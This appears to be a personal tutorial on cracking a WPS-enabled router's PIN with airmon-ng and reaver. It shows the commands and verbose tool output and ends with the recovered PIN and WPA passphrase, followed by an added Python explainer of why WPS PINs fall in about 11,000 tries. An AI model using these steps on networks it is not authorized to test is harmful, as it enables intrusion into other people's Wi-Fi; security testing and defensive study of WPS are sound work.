This is the way I tested the security of a wireless network with WPS enabled.
Put your wireless card into monitor mode:
$ sudo airmon-ng start wlan0
Run the ‘reaver’ program to crack the WPS PIN:
$ sudo reaver -i mon0 -b 00:11:22:33:44:55 -vv
Replace 00:11:22:33:44:55 with the BSSID of the wireless router (with WPS enabled).
You should see these messages:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 1
[+] Associated with 00:11:22:33:44:55 (ESSID: WPS-ROUTER)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
Many hours later (more than 10h in my case):
[+] Pin cracked in 38417 seconds
[+] WPS PIN: '77805034'
[+] WPA PSK: '6C0D5A37E7B0A30C'
[+] AP SSID: 'WPS-ROUTER'
Nice tutorial: https://www.youtube.com/watch?v=SY0WMHTCCOM
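Reading the transcript above from the defender's side, as an added example (not part of the original post or of Reaver): the access point answers with a NACK right after M4 when the first four PIN digits are wrong and after M6 when the next three are wrong, and the eighth digit is only a checksum, so the PIN space is 11,000 values rather than 100,000,000. The function names and the third sample attempt are constructed for illustration.

```python
import re

# Constructed sample: two attempts shortened from the transcript above, plus a
# made-up third attempt that gets as far as M6 to show the other failure point.
SAMPLE = """\
[+] Trying pin 12345670
[+] Sending M2 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Trying pin 00005678
[+] Sending M4 message
[+] Received WSC NACK
[+] Trying pin 77800008
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
"""

# Which part of the PIN the AP has just rejected, keyed by the last message sent.
REJECTED = {"M4": "first half (digits 1-4)", "M6": "second half (digits 5-7)"}

def wps_checksum(pin7: int) -> int:
    """Check digit (8th digit) derived from the first seven digits of a WPS PIN."""
    acc = 0
    while pin7:
        acc += 3 * (pin7 % 10)
        pin7 //= 10
        acc += pin7 % 10
        pin7 //= 10
    return (10 - acc % 10) % 10

def explain(log: str):
    """Return (pin, rejected part, checksum digit valid) for every NACKed attempt."""
    out, pin, last = [], None, None
    for line in log.splitlines():
        if m := re.search(r"Trying pin (\d{8})", line):
            pin, last = m.group(1), None
        elif m := re.search(r"Sending (M\d) message", line):
            last = m.group(1)
        elif "Received WSC NACK" in line and pin:
            valid = int(pin[7]) == wps_checksum(int(pin[:7]))
            out.append((pin, REJECTED.get(last, "unknown"), valid))
            pin = None
    return out

def max_attempts() -> int:
    """Worst case: 10^4 first halves, then 10^3 second halves (digit 8 is computed)."""
    return 10**4 + 10**3

if __name__ == "__main__":
    for row in explain(SAMPLE):
        print(row)
    print("worst-case attempts:", max_attempts())
```

This bound is why the run above finishes in hours; an access point with WPS PIN disabled never reaches the M4 stage at all.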